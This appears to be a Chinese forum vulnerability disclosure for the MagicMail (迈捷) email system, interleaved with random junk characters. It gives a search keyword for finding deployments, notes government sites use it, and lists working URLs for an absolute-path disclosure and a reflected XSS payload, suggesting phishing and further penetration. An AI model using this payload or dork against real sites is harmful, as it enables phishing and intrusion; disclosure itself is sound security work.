今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
' ~) p9 Y4 O7 t% g+ U0 R
1 o, ]$ u* L: [' k, w6 w 8 B% ~; ]8 w2 P* h6 G
包含 一个反射性XSS 以及 绝对路径泄漏
- _" z/ U* S& H5 L0 c" d看了看 貌似全部是linux的。, g% x6 i& { h
0 v1 p& j# H* L! z o; a
关键字:迈捷邮件系统 by MagicMail% V d9 }/ v" e# w' |
' ]9 p( `: e$ i9 H; W$ R
可以看到很多政府网站都用这个邮件系统* t h! [: g& R1 I
6 `) P% w7 X* e# S7 ~/ r
绝对路径 http://madman.in/index.php?login_type=declare&language=& r* _' A! X" s: ?% C9 C; m1 T
. ]3 T1 y0 h, A* d, V
# L V& p" u4 U- @# d4 _
) B3 c9 f. y" u# z* S+ g% K
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E. a7 A4 G+ Q) D, c! p
1 f% z8 b7 F4 i% T. A
1 \: P/ U! l9 n1 e. T) }+ J
, e8 ^. [$ z4 D! \) t; K8 P虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等6 d+ f3 W8 o0 ~8 o) |
$ m( e' k# F8 O9 q1 [
修复方案:看官方补丁吧。+ b3 s: d# `2 q4 |& F3 K
|